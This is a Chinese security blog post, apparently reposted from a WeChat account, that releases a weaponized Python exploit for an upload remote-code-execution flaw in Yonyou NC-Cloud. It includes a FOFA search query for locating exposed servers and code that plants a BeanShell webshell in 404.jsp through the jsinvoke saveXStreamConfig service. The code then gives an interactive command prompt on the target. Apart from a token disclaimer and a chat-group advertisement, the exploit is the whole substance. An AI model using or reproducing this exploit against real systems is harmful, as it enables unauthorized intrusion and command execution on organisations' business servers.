gh开始到一个小高潮了,每天0day爆出无数,既然发现这个也被爆了那就直接把武器化脚本丢给大家,祝各位打出自己满意的成绩!!为国家网络安全提升做出贡献!!!
免责声明:本工具只为学习使用,切勿用户非法途径。一切因本工具或此漏洞产生的后果,利用者自己承担,与本公众号任何人无关!!!!
用友nc-Cloud upload rce
fofa=app="用友-NC-Cloud"
import requestsimport redef cmd(url, command):url = url + "/404.jsp?error=bsh.Interpreter"headers = {"Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"}data = {"cmd": "org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(\"" + command + "\").getInputStream())"}r = requests.post(url, headers=headers, data=data)print(re.findall(r'<string>(.*?)</string>', r.text, re.S)[0])def upload(url):url = url + "/uapjs/jsinvoke/?action=invoke"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Content-Type": "application/x-www-form-urlencoded", "Accept-Encoding": "gzip"}json={"methodName": "saveXStreamConfig", "parameters": ["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}", "webapps/nc_web/404.jsp"], "parameterTypes": ["java.lang.Object", "java.lang.String"], "serviceName": "nc.itf.iufo.IBaseSPService"}r = requests.post(url, headers=headers, json=json)if r.status_code == 200:print("上传成功")else:print("上传失败")def main():url = input("请输入url:")upload(url)while True:command = input("请输入命令(quit退出) > ")if command == "quit":breakcmd(url, command)if __name__ == '__main__':main()
请勿用于非法用途!!!!后果自负
41全体祝大家工作顺利!!!!!
欢迎各位大佬入群交流,需要各种资料也可入群领取。
二维码失效加好友进群!!!!!!!!!!!
群满请加wx入群!!!!!!!
wx:Mathearsion
文章来源: https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&mid=2247483875&idx=1&sn=652f0ee576f934b53b3e4fcd2bebfbf7&chksm=c3672f49f410a65f82d3542d66ac4f09a5f1d9f2e0eaca8a4cea5511e1a1e77e86b40368eedb&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh